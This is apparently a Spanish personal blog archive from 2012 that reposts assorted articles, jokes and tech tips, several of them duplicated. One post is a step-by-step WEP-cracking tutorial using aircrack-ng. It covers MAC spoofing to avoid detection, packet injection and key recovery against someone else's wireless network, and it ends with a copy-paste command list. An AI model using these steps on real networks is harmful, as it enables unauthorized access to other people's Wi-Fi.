“Tampoco necesitan ser root para entrar en el sistema por vía remota, es el caso de Slapper un gusano que explotando una vulnerabilidad en el SSL de Apache (los certificados que permiten comunicación segura), creó su propia red de máquinas zombie en septiembre de 2002”.
Respuesta:
Ese ejemplo no alude a un virus, sino un gusano. La diferencia es muy importante: un gusano es un programa que explota un servicio de cara a Internet para transmitirse. No afecta a programas locales. Por ello, solamente afecta a los servidores; no a máquinas particulares.
Los gusanos han sido siempre muy pocos y de incidencia ínfima. Los tres realmente importantes nacieron en los 80, una época en la que Internet era inocente, y todo el mundo se fiaba de todo el mundo. Recordemos que eran los que afectaban a sendmail, fingerd y rexec. Hoy en día la cosa es más complicada. Aunque no podemos negar que sigue habiéndolos y que, si no se controlan, son extremadamente peligrosos. Pero ahora, los tiempos de reacción ante los gusanos son muy cortos. Es el caso del Slapper: un gusano creado sobre una vulnerabilidad descubierta –y parcheada– dos meses antes de la aparición del propio gusano.
Aún suponiendo que todo el mundo que usara Linux tuviese Apache instalado y funcionando siempre, simplemente con actualizar mensualmente los paquetes hubiese sido más que suficiente para que nunca se corriera ningún riesgo.
Es cierto que el fallo de SSL que originó Slapper era crítico –de hecho, el mayor fallo encontrado en toda la historia de SSL2 y SSL3–, y como tal fue solucionado en pocas horas. Que dos meses más tarde de que se encontrara y se solucionara dicho problema, alguien hiciera un gusano sobre un error ya corregido, y que ese sea el ejemplo más potente que se puede dar como vulnerabilidad, cuando menos tranquiliza.
Como regla general, la solución a los gusanos no es comprar un antivirus, instalarlo y desperdiciar tiempo de cómputo manteniéndolo residente. La solución es hacer uso del sistema de actualizaciones de seguridad de nuestra distribución: teniendo la distribución actualizada, no habrá problemas. Ejecutar solamente los servicios que necesitamos es también una buena idea por dos razones: mejoramos el aprovechamiento de recursos, y evitamos problemas de seguridad.
Mito 3:
“No creo que el núcleo sea invulnerable. De hecho existe un grupo de programas malignos denominados con las siglas LRK (Linux Rootkits Kernel), que se basan precisamente en que explotan vulnerabilidades de módulos del kernel y sustituyen los binarios del sistema”.Respuesta:Los pasos (5) y (6) necesitan privilegios de root. Es algo complicado que los pasos (4) y (6) no sean detectados por el infectado. Pero lo divertido es que haya alguien que crea que existe un programa que puede hacer el paso (2) y (3) automáticamente.
Un rootkit es básicamente un parche al kernel que permite ocultar la existencia de determinados usuarios y procesos ante las herramientas habituales, gracias a que no aparecerán en el directorio /proc. Lo normal es que lo utilicen al final de un ataque, en primer lugar, van a explotar una vulnerabilidad remota para tener acceso a nuestra máquina. Después emprenderán una secuencia de ataques, para hacer escalado de privilegios hasta llegar a tener la cuenta de root. El problema cuando lo consiguen es cómo instalar un servicio en nuestra máquina sin ser detectados: ahí entra el rootkit. Se crea un usuario que será el usuario efectivo del servicio que queremos que se oculte, instalan el rootkit, y ocultan tanto dicho usuario como todos los procesos pertenecientes a dicho usuario.
De cómo ocultar la existencia de un usuario es útil a un virus es algo que podríamos discutir largamente, pero un virus que emplee un rootkit para instalarse parece divertido. Imaginemos la mecánica del virus (en pseudocódigo):
1) El virus entra en el sistema.
2) Localiza el código fuente del kernel. Si no está lo instala él mismo.
3) Configura el kernel para las opciones de hardware que procedan para la máquina en cuestión.
4) Compila el kernel.
5) Instala el nuevo kernel; modificando LILO o GRUB si es preciso.
6) Reinicia la máquina.
Como colofón, si nos encontramos con alguien que nos dice “cuando haya más máquinas con Linux habrá más virus”, y nos recomienda “disponer de un antivirus instalado y actualizarlo constantemente”, posiblemente esté relacionado con la empresa que comercializa el antivirus y las actualizaciones. Desconfía, posiblemente sea el mismo dueño.
Antivirus para Linux:
Es cierto que existen antivirus para
Linux buenos. El problema es que no hacen lo que los defensores de los
antivirus argumentan. Su función es filtrar el correo que pasa de
malware y virus para Windows, así como verificar la existencia de virus
de Windows en carpetas exportadas vía SAMBA; con lo que si empleamos
nuestra máquina como gateway de correo o como NAS para máquinas Windows,
podemos protegerlas.
Clam-AV:
No terminaremos nuestro reportaje sin hablar del principal antivirus existente para GNU/Linux: ClamAV.
ClamAV es un potentísimo antivirus bajo GPL que compila para la mayor parte de los Unix disponibles del mercado. Está diseñado para analizar los adjuntos a los mensajes de correo que pasen por la estación y filtrarlos de virus.
Esta aplicación se integra perfectamente con sendmail para permitir el filtrado de los virus que puedan almacenarse en los servidores Linux que proveen de correo a las empresas; disponiendo de una base de datos de virus que se actualiza diariamente, con soporte a forma digital. La base de datos se actualiza varias veces al día, y es un proyecto vivo y muy interesante.
Este potente programa es capaz de analizar virus incluso en adjuntos en formatos más complejos de abrir, como pueda ser RAR (2.0), Zip, Gzip, Bzip2, Tar, MS OLE2, MS Cabinet files, MS CHM (HTML COmprimido), y MS SZDD.
ClamAV soporta también mbox, Maildir, y archivos de correo en formato RAW, y ficheros Portable Executable comprimidos con UPX, FSG, y Petite. La pareja Clam AV y spamassassin son la pareja perfecta para proteger a nuestros clientes Windows desde los servidores de correo Unix.
ClamAV es un potentísimo antivirus bajo GPL que compila para la mayor parte de los Unix disponibles del mercado. Está diseñado para analizar los adjuntos a los mensajes de correo que pasen por la estación y filtrarlos de virus.
Esta aplicación se integra perfectamente con sendmail para permitir el filtrado de los virus que puedan almacenarse en los servidores Linux que proveen de correo a las empresas; disponiendo de una base de datos de virus que se actualiza diariamente, con soporte a forma digital. La base de datos se actualiza varias veces al día, y es un proyecto vivo y muy interesante.
Este potente programa es capaz de analizar virus incluso en adjuntos en formatos más complejos de abrir, como pueda ser RAR (2.0), Zip, Gzip, Bzip2, Tar, MS OLE2, MS Cabinet files, MS CHM (HTML COmprimido), y MS SZDD.
ClamAV soporta también mbox, Maildir, y archivos de correo en formato RAW, y ficheros Portable Executable comprimidos con UPX, FSG, y Petite. La pareja Clam AV y spamassassin son la pareja perfecta para proteger a nuestros clientes Windows desde los servidores de correo Unix.
CONCLUSIÓN
A la pregunta ¿Existen vulnerabilidades en sistemas Linux? la respuesta es ciertamente sí.
Nadie en su sano juicio lo duda; Linux no es OpenBSD. Otra cosa es la ventana de vulnerabilidad que tiene un sistema Linux que sea actualizado adecuadamente. Si nos preguntamos ¿existen herramientas para aprovechar estos agujeros de seguridad, y explotarlos? Pues también sí, pero eso no son virus, son exploits.
El virus debe saltar varias dificultades más que siempre se han
puesto como un defecto/problema de Linux por los defensores de Windows, y
que complican la existencia de virus reales –kernels que se recompilan,
muchas versiones de muchas aplicaciones, muchas distribuciones, cosas
que no pasan automáticamente de forma transparente al usuario, etc.–.
Los teóricos “virus” actuales hay que instalarlos a mano desde la cuenta
de root. Pero eso no puede ser considerado un virus.Nadie en su sano juicio lo duda; Linux no es OpenBSD. Otra cosa es la ventana de vulnerabilidad que tiene un sistema Linux que sea actualizado adecuadamente. Si nos preguntamos ¿existen herramientas para aprovechar estos agujeros de seguridad, y explotarlos? Pues también sí, pero eso no son virus, son exploits.
Como siempre digo a mis alumnos: no me creáis, por favor. Descargad e instalaros un rootkit en la máquina. Y si queréis más, leed el código fuente de los “virus” que hay en el mercado. La verdad está en el código fuente. Es difícil a un “autoproclamado” virus seguir nombrándolo de esa forma después de leer su código. Y si no sabéis leer código, una única medida de seguridad sencilla que os recomiendo: usad la cuenta de root solo para administrar la máquina, y mantener al día las actualizaciones de seguridad.
Solamente con eso es imposible que os entren virus y muy poco probable que lo hagan gusanos o que alguien ataque vuestra máquina con éxito.
Tomado de: http://blog.desdelinux.net/virus-en-gnulinux-realidad-o-mito/
24 noviembre 2012
La yegua Marylou
Un hombre estaba sentado tranquilo, leyendo su periódico cuando su esposa, furiosa, llega de la cocina y le revienta un sartenazo por la nuca,
¡¡¡PUM!!!
¡Por Dios! ¡ ¿Qué mierda te pasa, CARAJO...?!
¡¡¡Es por el papelito que encontré en el bolsillo de tu pantalón con el nombre de "Marylou" y un número!!!
El marido le dice: Amorcito... ¿te acuerdas del día que fui a la carrera de caballos? Pues, "Marylou" era la yegua a la que aposté y el número es cuánto estaban pagando por la apuesta.
Satisfecha, la mujer se retiró pidiendo 1000 disculpas...
Días después, estaba él nuevamente, sentado cuando...
¡¡¡¡PUM!!!!
Recibe un nuevo golpe, esta vez con una olla a presión. Más asustado, que idiota por el golpe, él le pregunta:
¡¡¡¡¡¡¡PERO LA PUTA MADRE QUE TE PARIÓ!!!!!!!
¿¿¿Qué paso ahora, carajo???
¡¡¡ LLAMO LA YEGUA !!!
¡¡¡PUM!!!
¡Por Dios! ¡ ¿Qué mierda te pasa, CARAJO...?!
¡¡¡Es por el papelito que encontré en el bolsillo de tu pantalón con el nombre de "Marylou" y un número!!!
El marido le dice: Amorcito... ¿te acuerdas del día que fui a la carrera de caballos? Pues, "Marylou" era la yegua a la que aposté y el número es cuánto estaban pagando por la apuesta.
Satisfecha, la mujer se retiró pidiendo 1000 disculpas...
Días después, estaba él nuevamente, sentado cuando...
¡¡¡¡PUM!!!!
Recibe un nuevo golpe, esta vez con una olla a presión. Más asustado, que idiota por el golpe, él le pregunta:
¡¡¡¡¡¡¡PERO LA PUTA MADRE QUE TE PARIÓ!!!!!!!
¿¿¿Qué paso ahora, carajo???
¡¡¡ LLAMO LA YEGUA !!!
23 noviembre 2012
Desencriptando WEP
Cuando ya lo hayas bajado y quemado pues introduce el CD en tu cd-rom y reinicia la computadora y has que se inicie desde el CD de backtrack)
cuando te pida usuario y contraseña usa los siguientes:
Usuario: root
Contraseña: toor
Introducelo todo en minúsculas
Luego cuando ya todo cargue escribe lo siguiente:
startx
Esto es para que se inicie el modo grafico.
Cuando escuches el sonido de Mortal Kombat un "Finish Him!" es que ya cargo y está listo para ser utilizado.
Bueno ahora viene lo bueno, abre una ventana de terminal (o consola) y escribe lo siguiente:
airmon-ng
Aquí te va a decir cuál es tu tarjeta inalámbrica, lo normal es que salga wlan0, o eth0, o eth1, cosas así por el estilo, tú te vas a dar cuenta de cuál es, en mi caso es la wlan0.
Luego introduce los siguientes comandos:
airmon-ng stop wlan0
ifconfig wlan0 down
Con esto deshabilitas la tarjeta de red inalámbrica para hacerle un cambio de mac, este con dos razones importantes: 1. Para que así no haya problemas de que te puedan detectar e impedirte futuras conexiones y 2. Vas a necesitar el número de mac mas adelante y esta es una fácil de escribir y recordar.
Para cambiar la mac escribe los siguientes comandos:
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Con el primer comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y con el segundo habilitaste nuevamente tu tarjeta de red inalámbrica (puede tardar un poco este ultimo comando)
Ahora vas a proceder a ver las redes inalámbricas que están a tu alcance con el siguiente comando:
airodump-ng wlan0
Va a salir la lista de las redes inalámbricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de la red inalámbrica).
Se que son más datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que mencione.
Cuando selecciones la red inalámbrica que vamos a atacar aprieta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar.
Para explicar bien esta parte vamos a poner un ejemplo:
BSSID
66:77:88:99:00:11
CHN
6
ESSID
ejemplo
Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:
airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
Donde:
-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto están en la dirección /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica
Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados, para poder descifrar una wep es necesario 20,000 paquetes. Te darás cuenta que puede ir muy lento, esto significa que ninguna persona está utilizando la red entonces no está generando tráfico y te podría llevar días llegar a los 20,000 paquetes, pero no te preocupes que ahora te enseñare como generar tráfico en la red.
Para inyectarle trafico a la red abre otra terminal (consola) donde introducirás los siguientes comandos:
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
-e es el nombre de la red que estamos atacando
Luego cuando salgan 4 líneas de códigos y te diga que la conexión esta succesfuld, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
Si por alguna razón no se puede conectar algunas de las razones son las siguientes:
-La red a la que quieres atacar está muy lejos
-Tu tarjeta de red no puede hacer inyección de paquetes
-El router tiene seguridad para evitar este tipo de ataques
Ahora para inyectarle el trafico introduce el siguientes comando:
aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0
Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
Veras que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te darás cuenta que la DATA va caminando muy rápido.
Ahora abre otra terminal (consola) e introduce el siguiente comando:
aircrack-ng prueba-01.cap
Donde:
-Prueba-01.cap es el archivo donde se están capturando los datos
Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:
[XX:XX:XX:XX:XX:XX]
Donde las XX son las letras o números de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]
La contraseña para esa red inalámbrica seria 1234567890.
Bueno para aquellos que quieren probar aquí les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:
# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap
Como se darán cuenta son pocos comandos pero llevan mucha explicación y lo trate de hacer de una forma entendible, ya estoy trabajando en el video, así que no se preocupen si no entienden, pronto voy a sacar el video donde igual voy a explicar los pasos.
Para aquellos que quieren probar otras formas de inyección aquí les dejo otras dos formas que me han funcionado perfecto:
Forma 2:
# aireplay-ng -1 0 -a -h <mac> -e wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando
Forma 3:
# aireplay-ng -1 0 -a -h <mac> -e wlan0
# aireplay-ng -5 -b -h <mac> wlan0
ver como se llama el archivo .xor
# packetforge-ng -0 -a -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y -w ARP
# aireplay-ng -2 -r ARP wlan0
cuando te pida usuario y contraseña usa los siguientes:
Usuario: root
Contraseña: toor
Introducelo todo en minúsculas
Luego cuando ya todo cargue escribe lo siguiente:
startx
Esto es para que se inicie el modo grafico.
Cuando escuches el sonido de Mortal Kombat un "Finish Him!" es que ya cargo y está listo para ser utilizado.
Bueno ahora viene lo bueno, abre una ventana de terminal (o consola) y escribe lo siguiente:
airmon-ng
Aquí te va a decir cuál es tu tarjeta inalámbrica, lo normal es que salga wlan0, o eth0, o eth1, cosas así por el estilo, tú te vas a dar cuenta de cuál es, en mi caso es la wlan0.
Luego introduce los siguientes comandos:
airmon-ng stop wlan0
ifconfig wlan0 down
Con esto deshabilitas la tarjeta de red inalámbrica para hacerle un cambio de mac, este con dos razones importantes: 1. Para que así no haya problemas de que te puedan detectar e impedirte futuras conexiones y 2. Vas a necesitar el número de mac mas adelante y esta es una fácil de escribir y recordar.
Para cambiar la mac escribe los siguientes comandos:
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Con el primer comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y con el segundo habilitaste nuevamente tu tarjeta de red inalámbrica (puede tardar un poco este ultimo comando)
Ahora vas a proceder a ver las redes inalámbricas que están a tu alcance con el siguiente comando:
airodump-ng wlan0
Va a salir la lista de las redes inalámbricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de la red inalámbrica).
Se que son más datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que mencione.
Cuando selecciones la red inalámbrica que vamos a atacar aprieta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar.
Para explicar bien esta parte vamos a poner un ejemplo:
BSSID
66:77:88:99:00:11
CHN
6
ESSID
ejemplo
Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:
airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
Donde:
-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto están en la dirección /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica
Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados, para poder descifrar una wep es necesario 20,000 paquetes. Te darás cuenta que puede ir muy lento, esto significa que ninguna persona está utilizando la red entonces no está generando tráfico y te podría llevar días llegar a los 20,000 paquetes, pero no te preocupes que ahora te enseñare como generar tráfico en la red.
Para inyectarle trafico a la red abre otra terminal (consola) donde introducirás los siguientes comandos:
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
-e es el nombre de la red que estamos atacando
Luego cuando salgan 4 líneas de códigos y te diga que la conexión esta succesfuld, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
Si por alguna razón no se puede conectar algunas de las razones son las siguientes:
-La red a la que quieres atacar está muy lejos
-Tu tarjeta de red no puede hacer inyección de paquetes
-El router tiene seguridad para evitar este tipo de ataques
Ahora para inyectarle el trafico introduce el siguientes comando:
aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0
Donde:
-b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
Veras que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te darás cuenta que la DATA va caminando muy rápido.
Ahora abre otra terminal (consola) e introduce el siguiente comando:
aircrack-ng prueba-01.cap
Donde:
-Prueba-01.cap es el archivo donde se están capturando los datos
Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:
[XX:XX:XX:XX:XX:XX]
Donde las XX son las letras o números de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]
La contraseña para esa red inalámbrica seria 1234567890.
Bueno para aquellos que quieren probar aquí les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:
# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap
Como se darán cuenta son pocos comandos pero llevan mucha explicación y lo trate de hacer de una forma entendible, ya estoy trabajando en el video, así que no se preocupen si no entienden, pronto voy a sacar el video donde igual voy a explicar los pasos.
Para aquellos que quieren probar otras formas de inyección aquí les dejo otras dos formas que me han funcionado perfecto:
Forma 2:
# aireplay-ng -1 0 -a
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando
Forma 3:
# aireplay-ng -1 0 -a
# aireplay-ng -5 -b
ver como se llama el archivo .xor
# packetforge-ng -0 -a
# aireplay-ng -2 -r ARP wlan0
22 noviembre 2012
La Fundación Linux propone una solución sencilla al problema del Secure Boot
La Fundación Linux y su Junta de Asesoramiento Técnico han presentado un plan para suministrar un mecanismo de arranque para Linux en aquellas máquinas que tengan activado UEFI Secure Boot. La fórmula escogida es tan simple como eficiente: un pre-cargador de arranque firmado con una clave de Microsoft.
Hasta aquí, el enfoque es similar al de Fedora, OpenSUSE y Ubuntu. El pre-cargador es capaz de iniciar a continuación un gestor completo como GRUB 2, que puede arrancar Linux y cualquier otro sistema operativo. ¿Dónde está entonces la diferencia con los tres mencionados? La “sutileza” está en que esta fórmula no implica la firma del gestor de arranque completo.
La Fundación Linux ha creado un gestor de arranque mínimo que no podrá arrancar ningún sistema operativo directamente. En su lugar, transferirá el control a cualquier gestor de arranque completo (firmado o sin firmar), que pueda arrancar un sistema operativo.
A primera vista el pre-cargador podría utilizarse para burlar el Secure Boot (que no permite ejecutar código sin firmar antes de iniciarse el sistema), aunque ciertamente no es así. Si el pre-cargador transfiere el control a un cargador de arranque firmado, el sistema se iniciará normalmente.
Si es a un cargador de arranque no firmado, el proceso se detendrá, presentando su propia pantalla de inicio, donde se requiere la intervención directa del usuario. Si éste confirma el arranque, el sistema se iniciará normalmente. De esta forma, no puede ejecutarse en segundo plano cediendo el control a un rootkit sin el conocimiento del usuario. El proceso será necesario sólo una vez.
Más información | The Linux Foundation
Imagen | Kai Hendry
En Genbeta | La Free Software Foundation frente a Secure Boot y la crítica hacia Ubuntu por su postura, En máquinas ARM con Windows 8 no podrá desactivarse el Secure Boot
Tomado de:
21 noviembre 2012
Reflexiones
Si yo sugiriera que entre la Tierra y Marte hay una tetera de porcelana que gira alrededor del Sol en una órbita elíptica, nadie podría refutar mi aseveración, siempre que me cuidara de añadir que la tetera es demasiado pequeña como para ser vista aun por los telescopios más potentes. Pero si yo dijera que, puesto que mi aseveración no puede ser refutada, dudar de ella es de una presuntuosidad intolerable por parte de la razón humana, se pensaría con toda razón que estoy diciendo tonterías. Sin embargo, si la existencia de tal tetera se afirmara en libros antiguos, si se enseñara cada domingo como verdad sagrada, si se instalara en la mente de los niños en la escuela, la vacilación para creer en su existencia sería un signo de excentricidad, y quien dudara merecería la atención de un psiquiatra en un tiempo iluminado, o la del inquisidor en tiempos anteriores.
Bertrand Russell – 1952
20 noviembre 2012
Arrancar desde USB equipos que no soportan arranques USB
Realmente, Plop es ideal para resucitar un viejo equipo o disponer de
nuevas funciones al arrancar. Si estan interesados en esta
herramienta, pueden visitar la pagina, donde además de los enlaces de
descarga encontraremos instrucciones detalladas sobre su instalación y
funcionamiento.
Aunque cada día es más raro encontrarse con equipos de escritorio que no soporten el arranque por USB, siempre es útil conocer herramientas para poder instalar distribuciones Live desde dispositivos de este tipo hasta en equipos que sólo arrancan de CD. Para esto tenemos PLoP
Los pasos son los siguientes:
Aunque cada día es más raro encontrarse con equipos de escritorio que no soporten el arranque por USB, siempre es útil conocer herramientas para poder instalar distribuciones Live desde dispositivos de este tipo hasta en equipos que sólo arrancan de CD. Para esto tenemos PLoP
Los pasos son los siguientes:
- Descargar y grabar en un CD la imagen del gestor de arranque PLoP.
- Reiniciar desde el CD y esperar a que cargue un menú de arranque en el que podremos elegir el USB.
- Si tenemos preparado la LiveCD sobre el USB ya tendremos todo resuelto.
19 noviembre 2012
Arte ASCII a la antigua usanza
El Arte ASCII es un medio artístico que utiliza recursos computarizados fundamentados en los caracteres de impresión del Código Americano Estándar de Intercambio de Información. Hoy día puede ser creado con cualquier editor de textos, aunque en la década previa al advenimiento del computador personal de escritorio (IBM PC, 1981), era utilizado de manera experimental por artistas y como medio alternativo de arte gráfico, utilizando tarjetas perforadas de 80 y 96 columnas, así como diversos programas compiladores o utilitarios (COBOL, RPG, IBM DITTO), combinado a impresoras de martillo de alta velocidad para fines de presentación.
Toda una maravilla estos dibujos con letras, al estilo de los modernos cuadros de ASCII Art, pero hecho con una máquina de escribir antigua. ¿Os imagináis lo complicado que debe de ser?
Via y más imágenes | One Cool Thing a Day
Tomado de: http://www.soygik.com/arte-ascii-a-la-antigua-usanza/
18 noviembre 2012
La Piedra
El distraído, tropezó en ella
El violento, la usó como proyectil
El emprendedor, la usó para construir
El campesino, cansado, la usó como asiento
El niño, la usó como juguete
El violento, la usó como proyectil
El emprendedor, la usó para construir
El campesino, cansado, la usó como asiento
El niño, la usó como juguete
Drummond, la usó como inspiración
David, la usó para matar a Goliat
Y Miguel Ángel, sacó de ella una bella escultura
En todos estos casos, la diferencia no estuvo en la piedra sino en el hombre.
No existe "piedra" en tu camino que, las más de las veces, no puedas aprovechar para tu propio crecimiento.
17 noviembre 2012
Lincos, el idioma creado para hablar con ET
Imaginaos que la próxima generación de telescopios espaciales nos
lleva a detectar un planeta idéntico a la Tierra. Imaginaos que existen
fundadas sospechas de que en esa Tierra 2 vive una civilización
tecnológica. E imaginaos finalmente, que por medio de algún canal,
podemos comunicarnos con ellos. ¿Empleamos el inglés o el español? Nada
de eso, lo mejor es usar Lincos.
Lincos (abreviatura de Lingua Cosmica) es un idioma no oral que se basa en las matemáticas. La idea se le ocurrió en 1960 a Hans Freudenthal, profesor de matemáticas de la Universidad de Utrecht, que pensó en hacer todo lo contrario a lo que haría un criptógrafo: crear un código fácimente comprensible, que evitase el montón de información asumida que hay detrás de nuestros lenguajes comunes. Para ello escribió un libro titulado “Lincos: Diseño de un idioma para la relación cósmica, Parte 1”.
Lincos (abreviatura de Lingua Cosmica) es un idioma no oral que se basa en las matemáticas. La idea se le ocurrió en 1960 a Hans Freudenthal, profesor de matemáticas de la Universidad de Utrecht, que pensó en hacer todo lo contrario a lo que haría un criptógrafo: crear un código fácimente comprensible, que evitase el montón de información asumida que hay detrás de nuestros lenguajes comunes. Para ello escribió un libro titulado “Lincos: Diseño de un idioma para la relación cósmica, Parte 1”.
Para crear un idioma así, cada símbolo debería verse definido
únicamente mediante los símbolos que le precedieron, y para ello los
primeros símbolos deberían ser conceptos que no necesitaran definición:
los números naturales (en base 2) y la aritmética básica. Todas las
civilizaciones a lo largo de la historia en la Tierra aprendieron a
contar, descubrieron las mismas propiedades numéricas, derivaron los
mismos teoremas y emplearon las mismas herramientas, lo cual nos lleva a
creer que las matemáticas son una constante universal (nunca mejor
dicho).
Pero sigamos contando como definir Lincos a un potencial oyente
galáctico. Tras la aritmética y los números naturales, se establecen una
serie de ejemplos encaminados a ilustrar los conceptos de igualdad,
comparación, variables y constantes. Más tarde se aborda la lógica proposicional, la teoría de conjuntos y la lógica de primer orden.
Tras estos primeros pasos, el creador del diccionario Lincos inicia
una segunda sección en la que establece vocabulario para describir el
tiempo, introduciendo medios para medir duraciones y para poder
referirse a momentos en el tiempo, lo cual hace surgir los conceptos de
pasado y futuro.
En una tercera sección (la más compleja) Freudenthal trata de
explicar los conceptos y el lenguaje necesario para describir el
comportamiento. Para hacer entender a ET los estados de ánimo, el autor
envía ejemplos de conversación entre individuos (que hacen las veces de
actores).
Finalmente en la cuarta sección se describen los conceptos y el
lenguaje relacionado con la masa, el espacio y el movimiento. Esta
última sección llega a describir rasgos físicos de los seres humanos y
del sistema solar.
Freudenthal planeó escribir un Segundo libro con cuatro secciones más
para el diccionario: material, Tierra, vida y “comportamiento 2”, pero
nunca llegó a hacerlo. Su lenguaje jamás se empleó en transmisión
alguna, y sigue siendo considerado un ejercicio teórico sobre
comunicación con extraterrestres, pero en la novela “Contact” de Carl
Sagan, los astrónomos del proyecto SETI reciben una transmisión de radio
procedente del espacio, que incluye una especie de diccionario Lincos
embebido en el propio lenguaje.
¿Llegará el día en que tengamos que echar mano del trabajo de
Freudenthal para ampliar el círculo de amistades? Eso espero… si es que
vienen en son de paz.
Artículos consultados: New Scientist y Wikipedia
Tomado de: http://maikelnai.elcomercio.es/2010/01/21/lincos-el-idioma-creado-para-hablar-con-et/
16 noviembre 2012
Gmail: búsquedas en el contenido de los archivos adjuntos
Si eres usuario del servicio de correo Gmail puede que te interese saber que es posible encontrar texto dentro de los archivos adjuntos, siempre que éstos estén en formato legibles (p.e. TXT, DOC, PDF, PPT,…), escribiendo en el buscador de Gmail
has:attachment palabras o texto a buscar
Utilizando únicamente la clave has:attachment Gmail muestra todos los mensajes con adjuntos. Y, como es habitual entrecomillando una frase
has:attachment "encuentra esta frase exacta"
Google hará una búsqueda exacta de ella dentro de los adjuntos, al menos de aquellos que ya estén idexados.
Esta caractrerística mola — pero, como siempre, ten en cuenta que funciona porque los archivos adjuntos están siendo leídos y procesados por el sistema.
Vía LifeHacker.
Tomado de: http://www.microsiervos.com/archivo/internet/gmail-busqueda-texto-contenido-archivos-adjuntos.html
has:attachment palabras o texto a buscar
Utilizando únicamente la clave has:attachment Gmail muestra todos los mensajes con adjuntos. Y, como es habitual entrecomillando una frase
has:attachment "encuentra esta frase exacta"
Google hará una búsqueda exacta de ella dentro de los adjuntos, al menos de aquellos que ya estén idexados.
Esta caractrerística mola — pero, como siempre, ten en cuenta que funciona porque los archivos adjuntos están siendo leídos y procesados por el sistema.
Vía LifeHacker.
Tomado de: http://www.microsiervos.com/archivo/internet/gmail-busqueda-texto-contenido-archivos-adjuntos.html
15 noviembre 2012
Cuanto más ayuda un hombre en el hogar, más alto es el riesgo de divorcio
Un
estudio noruego, que probablemente dará mucho que hablar, concluyó que
cuanto más equitativa es la repartición de las tareas domésticas entre
una pareja, más alto es el riesgo de divorcio.
Según el Instituto de Investigación en Ciencias Sociales Nova, el
porcentaje de divorcios en los hogares que comparten las tareas
domésticas equitativamente es un 50% más alto que en aquellos en los que
la mayor parte del trabajo es realizado por la mujer.
"Cuanto más ayuda un hombre en el hogar, más alto es el riesgo de
divorcio", explicó este jueves a la AFP Thomas Hansen, coautor de un
importante estudio titulado 'La igualdad en el hogar'.
Para los investigadores, no hay ninguna, o casi ninguna causalidad, y
esta correlación es más bien un signo de la "modernidad" de las
